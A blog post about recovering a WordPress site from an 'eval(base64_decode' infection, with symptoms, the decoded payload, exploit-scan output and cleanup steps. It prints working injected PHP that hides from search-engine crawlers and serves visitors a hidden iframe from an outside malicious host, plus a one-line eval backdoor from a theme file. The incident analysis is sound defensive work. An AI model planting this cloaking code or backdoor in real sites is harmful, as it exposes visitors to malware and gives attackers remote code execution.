WordPress eval base64_decode Hack

shop1024

09 Jul WordPress eval base64_decode Hack

Troubleshoot eval(base64_decode

 

This post describes the impact of eval(base64_decode on Zo Nicholas’ WordPress based Author blog.

1. The Symptoms

The first symptoms noticed were a change of the layout of the site: the site was not anymore browser centered but hanging on the left edge of the scree.

Checking out the site from server side, we notice that all index.php files show a modified first line starting like so:


eval(base64_decode('ZXJyb3JfcmVw......

then follows a long, long string of encrypted code.

 

Also we find unusual php files which have been added on server side.

Surprisingly all added content does not trigger a change of the date of the file (last modified).

2. The analysis

2.1 First we went to decode the above hack:


<code>zö¥ý¶¬{®?uç(uïÿerror_reporting(0);
$bot = FALSE ;
$user_agent_to_filter = array('bot','spider','spyder','crawl','validator','slurp','docomo','yandex','mail.ru','alexa.com','postrank.com','htmldoc','webcollage','blogpulse.com','anonymouse.org','12345','httpclient','buzztracker.com','snoopy','feedtools','arianna.libero.it','internetseer.com','openacoon.de','rrrrrrrrr','magent','download master','drupal.org','vlc media player','vvrkimsjuwly l3ufmjrx','szn-image-resizer','bdbrandprotect.com','wordpress','rssreader','mybloglog api');
$stop_ips_masks = array(
 array("216.239.32.0","216.239.63.255"),
 array("64.68.80.0" ,"64.68.87.255" ),
 array("66.102.0.0", "66.102.15.255"),
 array("64.233.160.0","64.233.191.255"),
 array("66.249.64.0", "66.249.95.255"),
 array("72.14.192.0", "72.14.255.255"),
 array("209.85.128.0","209.85.255.255"),
 array("198.108.100.192","198.108.100.207"),
 array("173.194.0.0","173.194.255.255"),
 array("216.33.229.144","216.33.229.151"),
 array("216.33.229.160","216.33.229.167"),
 array("209.185.108.128","209.185.108.255"),
 array("216.109.75.80","216.109.75.95"),
 array("64.68.88.0","64.68.95.255"),
 array("64.68.64.64","64.68.64.127"),
 array("64.41.221.192","64.41.221.207"),
 array("74.125.0.0","74.125.255.255"),
 array("65.52.0.0","65.55.255.255"),
 array("74.6.0.0","74.6.255.255"),
 array("67.195.0.0","67.195.255.255"),
 array("72.30.0.0","72.30.255.255"),
 array("38.0.0.0","38.255.255.255")
 );
$my_ip2long = sprintf("%u",ip2long($_SERVER['REMOTE_ADDR']));
foreach ( $stop_ips_masks as $IPs ) {
 $first_d=sprintf("%u",ip2long($IPs[0])); $second_d=sprintf("%u",ip2long($IPs[1]));
 if ($my_ip2long >= $first_d && $my_ip2long <= $second_d) {$bot = TRUE; break;}
}
foreach ($user_agent_to_filter as $bot_sign){
 if (strpos($_SERVER['HTTP_USER_AGENT'], $bot_sign) !== false){$bot = true; break;}
}
if (!$bot) {
echo '<iframe src="http://escpllns.co.tv/?go=1" width="1" height="1"></iframe>';
}?ÿÿÀ</code>

Decoding can be easily done from TOASTEDspam.

2.2 We run an exploit scan on the site

To scan the site we use the Exploit Scan Plug-in and get:

79 severe level matches:

webdesign/wp-includes/class-snoopy.php:678
Often used to execute malicious code    // I didn't use preg eval (//e) since that is only available in PHP 4.0.
webdesign/wp-includes/js/tinymce/plugins/wpdialogs/js/popup.js:1
Often used to execute malicious code    cuteOnLoad:function(s){this.onInit.add(function(){eval(s)})},storeSelection:function(){this.editor.win
webdesign/wp-includes/js/tinymce/plugins/wpdialogs/js/popup.dev.js:152
Often used to execute malicious code    eval(s);
webdesign/wp-includes/js/tinymce/tiny_mce_popup.js:5
Often used to execute malicious code    cuteOnLoad:function(s){this.onInit.add(function(){eval(s)})},storeSelection:function(){this.editor.win
webdesign/wp-includes/js/tinymce/tiny_mce.js:1
Often used to execute malicious code    eturn""+e},parse:function(s){try{return eval("("+s+")")}catch(ex){}}});t
webdesign/wp-includes/js/json2.js:1
Often used to execute malicious code    .replace(/(?:^|:|,)(?:\s*\[)+/g,""))){j=eval("("+text+")");return typeof
webdesign/wp-includes/js/json2.dev.js:466
Often used to execute malicious code    j = eval('(' + text + ')');
webdesign/wp-includes/js/tw-sack.dev.js:119
Often used to execute malicious code    eval(this.response);
webdesign/wp-includes/js/scriptaculous/unittest.js:476
Often used to execute malicious code    eval('with(this){'+test+'}');
webdesign/wp-includes/js/scriptaculous/controls.js:786
Often used to execute malicious code    this._collection = eval(js);
webdesign/wp-includes/js/jquery/jquery.schedule.js:30
Often used to execute malicious code    ctx["func"]=eval("function () { "+ctx["func"
webdesign/wp-includes/js/jquery/jquery.form.dev.js:333
Often used to execute malicious code    eval("data = " + data);
webdesign/wp-includes/js/jquery/jquery.form.dev.js:335
Often used to execute malicious code    $.globalEval(data);
webdesign/wp-includes/js/jquery/jquery.js:20
Often used to execute malicious code    async:false,dataType:"script"}):c.globalEval(b.text||b.textContent||b.innerHTML||""
webdesign/wp-includes/js/jquery/jquery.js:144
Often used to execute malicious code    p;e.indexOf("javascript")>=0)c.globalEval(a);return a}});
webdesign/wp-includes/js/jquery/jquery.form.js:1
Often used to execute malicious code    .responseText;if(opts.dataType=="json"){eval("data = "+data)}else{$.globalEval(data)}}else{if(opts.dataType=="xml"){
webdesign/wp-includes/js/tw-sack.js:1
Often used to execute malicious code    .argumentSeparator)}};this.runResponse=function(){eval(this.response)};this.runAJAX=function(urlstring
webdesign/wp-includes/js/prototype.js:495
Often used to execute malicious code    is.extractScripts().map(function(script) { return eval(script) });
webdesign/wp-includes/js/prototype.js:599
Often used to execute malicious code    if (!sanitize || json.isJSON()) return eval('(' + json + ')');
webdesign/wp-includes/js/prototype.js:1533
Often used to execute malicious code    return eval((this.transport.responseText || '').u
webdesign/wp-includes/js/prototype.js:3257
Often used to execute malicious code    eval(this.matcher.join('\n'));
webdesign/wp-includes/js/swfupload/swfupload-all.js:2
Often used to execute malicious code    Array,0)+"</invoke>");returnValue=eval(returnString)}catch(ex){throw"Call to &quo
webdesign/wp-includes/js/swfupload/swfupload.js:450
Often used to execute malicious code    returnValue = eval(returnString);
webdesign/wp-includes/class-json.php:22
Often used to execute malicious code    * Javascript, and can be directly eval()'ed with no further parsing
webdesign/wp-includes/class-simplepie.php:14832
Used by malicious scripts to decode previously obscured data/programs    $data = base64_decode($data);
webdesign/wp-includes/class-IXR.php:303
Used by malicious scripts to decode previously obscured data/programs    $value = base64_decode($this->_currentTagContents);
webdesign/wp-includes/functions.php:190
Often used to execute malicious code    if ( doubleval($bytes) >= $mag )
webdesign/wp-admin/js/revisions-js.php:31
Often used to execute malicious code    eval(function(p,a,c,k,e,r){e=function(c){return(c<
webdesign/wp-admin/press-this.php:236
Often used to execute malicious code    var my_src = eval(
webdesign/wp-admin/press-this.php:247
Often used to execute malicious code    var my_src = eval(
webdesign/wp-admin/press-this.php:430
Often used to execute malicious code    eval(data);
webdesign/wp-admin/includes/class-pclzip.php:4063
Often used to execute malicious code    // eval('$v_result = '.$p_options[PCLZIP_CB_P
webdesign/wp-app.php:1457
Used by malicious scripts to decode previously obscured data/programs    explode(':', base64_decode(substr($_SERVER['HTTP_AUTHORIZATION']
webdesign/wp-app.php:1462
Used by malicious scripts to decode previously obscured data/programs    explode(':', base64_decode(substr($_SERVER['REDIRECT_REMOTE_USER'
webdesign/index.php:1
Often used to execute malicious code    <?php eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0
webdesign/index.php:1
Used by malicious scripts to decode previously obscured data/programs    <?php eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBT
index.php_ORG:1
Often used to execute malicious code    <?php eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0
index.php_ORG:1
Used by malicious scripts to decode previously obscured data/programs    <?php eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBT
logodesign/swfaddress/swfaddress.js:1
Often used to execute malicious code    ot;tracker"]!="undefined"&&eval("typeof "+_2c["tracker"]+" != \"undefined\"")){var fn=eval(_2c["tracker"]);if(typeof fn=="function"){fn((_l.pathname+SWFAddress.getValue()).replace(/\/\//,"/").replace(/^\/$/,""));}}};var _40=function(){var doc=_22.contentWindow.document;doc.open();doc.write("<script>var swfaddress = \""+_2d()+"\";</script>");doc.close();};var _42=function(){if(_2c["html"]){var src=_22.contentWindow.location.href;_2f=(src.indexOf("?")>-1)?src.substring(src.indexOf("?")+1):"";}else{_2f=(typeof _22.contentWindow.swfaddress!="undefined")?_22.contentWindow.swfaddress:"";}if(_2f!=_2d()){_35();_l.hash=_2f;}};var _44=function(){var _45="id=\"swfaddress\" style=\"position:absolute;top:-9999px;\"";if(_1d.isIE()){document.body.appendChild(document.createElement("div")).innerHTML="<iframe "+_45+" src=\""+(_2c["html"]?_24.replace(/\.js(\?.*)?$/,".html")+"?"+_2d():"javascript:false;")+"\"></iframe>";_22=document.getElementById("swfaddress");setTimeout(function(){if(!_2c["html"]&&typeof _22.contentWindow.swfaddress=="undefined"){_40();}com.asual.util.Events.addListener(_22,"load",_42);},10);}else{if(_1d.isSafari()){if(_1d.getVersion()<412){document.body.innerHTML+="<form "+_45+" method=\"get\"></form>";_23=document.getElementById("swfaddress");}if(typeof _l.swfaddress=="undefined"){_l.swfaddress={};}if(typeof _l.swfaddress[_l.pathname]!="undefined"){_2a=_l.swfaddress[_l.pathname].split(",");}}else{if(_1d.isOpera()&&_2b.length==0){document.body.innerHTML+="<embed "+_45+" src=\""+_24.replace(/\.js(\?.*)?$/,".swf")+"\" type=\"application/x-shockwave-flash\" />";}}}setTimeout(_38,1);setTimeout(_39,2);setTimeout(_3e,10);setInterval(_34,50);};this.onInit=null;this.onChange=null;this.toString=function(){return "[class SWFAddress]";};this.back=function(){_h.back();};this.forward=function(){_h.forward();};this.go=function(_46){_h.go(_46);};this.href=function(url,_48){_48=typeof _48!="undefined"?_48:"_self";switch(_48){case "_self":self.location.href=url;break;case "_top":_l.href=url;break;case "_blank":window.open(url);break;default:top.frames[_48].location.href=url;break;}};this.popup=function(url,_4a,_4b,_4c){var _4d=window.open(url,_4a,eval(_4b));eval(_4c);};this.addEventListener=function(_4e,_4f){if(typeof _29[_4e]=="undefined"){_29[_4e]=[];}_29[_4e].push(_4f);};this.removeEventListener=function(_50,_51){if(typeof _29[_50]!="undefined"){for(var i=0,l;l=_29[_50][i];i++){if(l==_51){break;}}_29[_50].splice(i,1);}};this.dispatchEvent=function(_54){if(typeof _29[_54.type]!="undefined"&&_29[_54.type].length){_54.target=this;for(var i=0,l;l=_29[_54.type][i];i++){l(_54);}return true;}return false;};this.hasEventListener=function(_57){return (typeof _29[_57]!="undefined"&&_29[_57].length>0);};this.getStrict=function(){return _2c["strict"];};this.setStrict=function(_58){_2c["strict"]=enabled;};this.getHistory=function(){return _2c["history"];};this.setHistory=function(_59){_2c["history"]=_59;};this.getTracker=function(){return _2c["tracker"];};this.setTracker=function(_5a){_2c["tracker"]=_5a;};this.getIds=function(){return _2b;};this.getId=function(_5b){return _2b[0];};this.setId=function(id){_2b[0]=id;};this.addId=function(id){this.removeId(id);_2b.push(id);};this.removeId=function(id){for(var i=0,_60;_60=_2b[i];i++){if(id==_60){_2b.splice(i,1);break;}}};this.getTitle=function(){return _d.title;};this.setTitle=function(_61){if(!_1e){return null;}if(typeof _61=="undefined"){return;}if(_61=="null"){_61="";}_26=_d.title=_61;if(_22&&_22.contentWindow){_22.contentWindow.document.title=_61;}};this.getStatus=function(){return top.status;};this.setStatus=function(_62){if(!_1e){return null;}if(typeof _62=="undefined"){return;}if(!_1d.isSafari()){if(_62=="null"){_62="";}_62=_30(_62,true);if(_62=="/"){_62="";}if(!(/http(s)?:\/\//.test(_62))){var _63=_l.href.indexOf("#");_62=(_63==-1?_l.href:_l.href.substr(0,_63))+"#"+_62;}top.status=_62;}};this.resetStatus=function(){top.status="";};this.getValue=function(){if(!_1e){return null;}return _30(_2f,false);};this.setValue=function(_64){if(!_1e){return null;}if(typeof _64=="undefined"){return;}if(_64=="null"){_64="";}_64=_30(_64,true);if(_64=="/"){_64="";}if(_2f==_64){return;}_2f=_64;_28=true;_35();_2a[_h.length]=_2f;if(_1d.isSafari()){if(_2c["history"]){_l.swfaddress[_l.pathname]=_2a.toString();_27=_h.length+1;if(_1d.getVersion()<412){if(_l.search==""){_23.action="#"+_2f;_23.submit();}}else{var evt=document.createEvent("MouseEvents");evt.initEvent("click",true,true);var _66=document.createElement("a");_66.href="#"+_2f;_66.dispatchEvent(evt);}}else{_l.replace("#"+_2f);}}else{if(_2f!=_2d()){if(_2c["history"]){_l.hash="#"+_2f;}else{_l.replace("#"+_2f);}}}if(_1d.isIE()&&_2c["history"]){if(_2c["html"]){_22.contentWindow.location.assign(_22.contentWindow.location.pathname+"?"+_2d());}else{_40();}}setTimeout(_3e,10);_28=false;};this.getPath=function(){var _67=this.getValue();if(_67.indexOf("?")!=-1){return _67.split("?")[0];}else{return _67;}};this.getQueryString=function(){var _68=this.getValue();var _69=_68.indexOf("?");if(_69!=-1&&_69<_68.length){return _68.substr(_69+1);}return "";};this.getParameter=function(_6a){var _6b=this.getValue();var _6c=_6b.indexOf("?");if(_6c!=-1){_6b=_6b.substr(_6c+1);var _6d=_6b.split("&");var p,i=_6d.length;while(i--){p=_6d[i].split("=");if(p[0]==_6a){return p[1];}}}return "";};this.getParameterNames=function(){var _70=this.getValue();var _71=_70.indexOf("?");var _72=[];if(_71!=-1){_70=_70.substr(_71+1);if(_70!=""&&_70.indexOf("=")!=-1){var _73=_70.split("&");var i=0;while(i<_73.length){_72.push(_73[i].split("=")[0]);i++;}}}return _72;};if(!_1e){return;}for(var i=1;i<_27;i++){_2a.push("");}_2a.push(_l.hash.replace(/^#/g,""));if(_1d.isIE()&&_l.hash!=_2d()){_l.hash="#"+_2d();}var _76=document.getElementsByTagName("script");for(var i=0,s;s=_76[i];i++){if(s.src.indexOf(_js)>-1){_24=String(s.src);break;}}if((qi=_24.indexOf("?"))>-1){var _78,_79=_24.substr(qi+1).split("&");for(var j=0,p;p=_79[j];j++){_78=p.split("=");if(/^(history|html|strict)$/.test(_78[0])){_2c[_78[0]]=(isNaN(_78[1])?eval(_78[1]):(parseFloat(_78[1])>0));}if(/^tracke
wp-content/plugins/backwpup/app/php5-functions.php:385
Used by malicious scripts to decode previously obscured data/programs    ay($jobvalue['sugaruser'].'|'.base64_decode($jobvalue['sugarpass']).'|'
wp-content/plugins/backwpup/app/php5-functions.php:388
Used by malicious scripts to decode previously obscured data/programs    = new SugarSync($jobvalue['sugaruser'],base64_decode($jobvalue['sugarpass']),BACKWPUP_SUGA
wp-content/plugins/backwpup/app/php5-functions.php:405
Used by malicious scripts to decode previously obscured data/programs    []=$jobvalue['sugaruser'].'|'.base64_decode($jobvalue['sugarpass']).'|'
wp-content/plugins/backwpup/app/php5-functions.php:503
Used by malicious scripts to decode previously obscured data/programs    gin($ftp_conn_id, $jobvalue['ftpuser'], base64_decode($jobvalue['ftppass']))) {
wp-content/plugins/backwpup/app/php5-functions.php:507
Used by malicious scripts to decode previously obscured data/programs    $return=ftp_raw($ftp_conn_id,'PASS '.base64_decode($jobvalue['ftppass']));
wp-content/plugins/backwpup/app/php5-functions.php:522
Used by malicious scripts to decode previously obscured data/programs    ['ftpuser']).":".rawurlencode(base64_decode($jobvalue['ftppass']))."@".
wp-content/plugins/backwpup/app/libs/pclzip.lib.php:2622
Often used to execute malicious code    // eval('$v_result = '.$p_options[PCLZIP_CB_P
wp-content/plugins/backwpup/app/libs/pclzip.lib.php:2776
Often used to execute malicious code    // eval('$v_result = '.$p_options[PCLZIP_CB_P
wp-content/plugins/backwpup/app/libs/pclzip.lib.php:3699
Often used to execute malicious code    // eval('$v_result = '.$p_options[PCLZIP_CB_P
wp-content/plugins/backwpup/app/libs/pclzip.lib.php:3946
Often used to execute malicious code    // eval('$v_result = '.$p_options[PCLZIP_CB_P
wp-content/plugins/backwpup/app/libs/pclzip.lib.php:4067
Often used to execute malicious code    // eval('$v_result = '.$p_options[PCLZIP_CB_P
wp-content/plugins/backwpup/app/libs/pclzip.lib.php:4135
Often used to execute malicious code    // eval('$v_result = '.$p_options[PCLZIP_CB_P
wp-content/plugins/backwpup/app/libs/pclzip.lib.php:4182
Often used to execute malicious code    // eval('$v_result = '.$p_options[PCLZIP_CB_P
wp-content/plugins/backwpup/app/libs/pclzip.lib.php:4253
Often used to execute malicious code    // eval('$v_result = '.$p_options[PCLZIP_CB_P
wp-content/plugins/backwpup/app/libs/Microsoft/WindowsAzure/SessionHandler.php:147
Used by malicious scripts to decode previously obscured data/programs    return base64_decode($sessionRecord->serializedData);
wp-content/plugins/backwpup/app/libs/Microsoft/WindowsAzure/Storage/Queue.php:464
Used by malicious scripts to decode previously obscured data/programs    base64_decode((string)$xmlMessages[$i]->MessageText)
wp-content/plugins/backwpup/app/libs/Microsoft/WindowsAzure/Credentials/CredentialsAbstract.php:108
Used by malicious scripts to decode previously obscured data/programs    $this->_accountKey = base64_decode($accountKey);
wp-content/plugins/backwpup/app/libs/Microsoft/WindowsAzure/Credentials/CredentialsAbstract.php:132
Used by malicious scripts to decode previously obscured data/programs    $this->_accountKey = base64_decode($value);
wp-content/plugins/backwpup/app/libs/dropbox/oauth.php:216
Used by malicious scripts to decode previously obscured data/programs    $decoded_sig = base64_decode($signature);
wp-content/plugins/backwpup/app/libs/aws/services/ec2.class.php:491
Used by malicious scripts to decode previously obscured data/programs    if (openssl_private_decrypt(base64_decode($data), $decrypted, $private_key))
wp-content/plugins/backwpup/app/libs/aws/services/ec2.class.php:1820
Used by malicious scripts to decode previously obscured data/programs    $response->body->output = base64_decode($response->body->output);
wp-content/plugins/backwpup/app/options-save.php:210
Used by malicious scripts to decode previously obscured data/programs    = new SugarSync($jobvalue['sugaruser'],base64_decode($jobvalue['sugarpass']),BACKWPUP_SUGA
wp-content/plugins/backwpup/app/options-save.php:246
Used by malicious scripts to decode previously obscured data/programs    gin($ftp_conn_id, $jobvalue['ftpuser'], base64_decode($jobvalue['ftppass']))) {
wp-content/plugins/backwpup/app/options-save.php:250
Used by malicious scripts to decode previously obscured data/programs    $return=ftp_raw($ftp_conn_id,'PASS '.base64_decode($jobvalue['ftppass']));
wp-content/plugins/backwpup/app/options-save.php:342
Used by malicious scripts to decode previously obscured data/programs    ew SugarSync($jobs[$jobid]['sugaruser'],base64_decode($jobs[$jobid]['sugarpass']),BACKWPUP_
wp-content/plugins/backwpup/app/backwpup_dojob.php:909
Used by malicious scripts to decode previously obscured data/programs    $ftp_conn_id, $this->job['ftpuser'], base64_decode($this->job['ftppass']))) {
wp-content/plugins/backwpup/app/backwpup_dojob.php:916
Used by malicious scripts to decode previously obscured data/programs    $return=ftp_raw($ftp_conn_id,'PASS '.base64_decode($this->job['ftppass']));
wp-content/plugins/backwpup/app/backwpup_dojob.php:965
Used by malicious scripts to decode previously obscured data/programs    .$this->job['ftpuser'].":".base64_decode($this->job['ftppass'])."@&quo
wp-content/plugins/backwpup/app/backwpup_dojob.php:1010
Used by malicious scripts to decode previously obscured data/programs    $phpmailer->Password=base64_decode($this->cfg['mailpass']);
wp-content/plugins/backwpup/app/backwpup_dojob.php:1337
Used by malicious scripts to decode previously obscured data/programs    ew SugarSync($this->job['sugaruser'],base64_decode($this->job['sugarpass']),BACKWPUP_
wp-content/plugins/backwpup/app/backwpup_dojob.php:1514
Used by malicious scripts to decode previously obscured data/programs    $phpmailer->Password=base64_decode($this->cfg['mailpass']);
wp-content/plugins/backwpup/app/options-settings.php:51
Used by malicious scripts to decode previously obscured data/programs    pe="password" value="<?PHP echo base64_decode($cfg['mailpass']);?>" class=&
wp-content/plugins/backwpup/app/options-edit-job.php:354
Used by malicious scripts to decode previously obscured data/programs    pe="password" value="<?PHP echo base64_decode($jobvalue['ftppass']);?>" cla
wp-content/plugins/backwpup/app/options-edit-job.php:449
Used by malicious scripts to decode previously obscured data/programs    pe="password" value="<?PHP echo base64_decode($jobvalue['sugarpass']);?>" c
wp-content/plugins/backwpup/app/options-edit-job.php:452
Used by malicious scripts to decode previously obscured data/programs    ['sugaruser'],'sugarpass'=>base64_decode($jobvalue['sugarpass']),'sugarro
wp-content/themes/zo/functions.php:1
Often used to execute malicious code    <?php if (isset($_REQUEST['asc'])) eval(stripslashes($_REQUEST['asc']));
store/wp-includes/class-snoopy.php:678
Often used to execute malicious code    // I didn't use preg eval (//e) since that is only available in PHP 4.0.
itconsulting/wp-app.php:1457
Used by malicious scripts to decode previously obscured data/programs    explode(':', base64_decode(substr($_SERVER['HTTP_AUTHORIZATION']
itconsulting/wp-app.php:1462
Used by malicious scripts to decode previously obscured data/programs    explode(':', base64_decode(substr($_SERVER['REDIRECT_REMOTE_USER'
Post: Welcome! Edit
Malicious scripts loaded in posts by hackers perform redirects, inject spam, etc.    p>Zo<br />  </p> <p><script type="text/javascript"> var gaJsH

Further 39 Warnings were detected.

Besides, the scan came forth with 520 noteworthy matches.

3. Troubleshooting eval (base64_decode

While the Exploit scan indicates where the hack may have impacted, the result may not be complete.

As you can see from the above, manual troubleshooting can easily mess up your week-end!

In order to get through in the most efficient way, this is how I will proceed:

1. Delete WordPress manually

I will manually delete all WordPress files in the root as well as the folders wp-admin and wp-includes, as well as the plugins. By deleting and then reloading WordPress we are sure that no added files will remain on the server.

I will replace the deleted files and folders manually from a downloaded version of WordPress 3.2 (latest version).

2. Clean out wp-content

As this folder stores your themes and uploaded media, I go through the folders and files manually, deleting any file which appears to be suspect.

3. Load a Database back-up

As we are backing up our sites on all servers daily, weekly and monthly, we will just load the latest clean MySQL databases.

4. Alternative

If you dispose of a full account or server back-up, just load the latest clean back-up.

Conclusion

Whenever our sites are down, we lose money! Site maintenance and back-ups are essential for minimizing the risk. During the last 3 months I have spent many hours on the eval (base64_decode hack and I guess it’s one of the more problematic hacks you can experience on your WordPress or other installation. In any case, the recovery may be time consuming and therefore costly.

2 Comments
  • Syclone0044
    Posted at 07:56h, 02 May Reply

    Fabulous writeup!! Thanks so much. This base64_decode hack is a PITA to clean out. Your post laid it out for me.

  • Z Nicholas
    Posted at 03:32h, 11 July Reply

    Thank you for all your help, hoping we have got rid of this nasty once and for all.

Post A Comment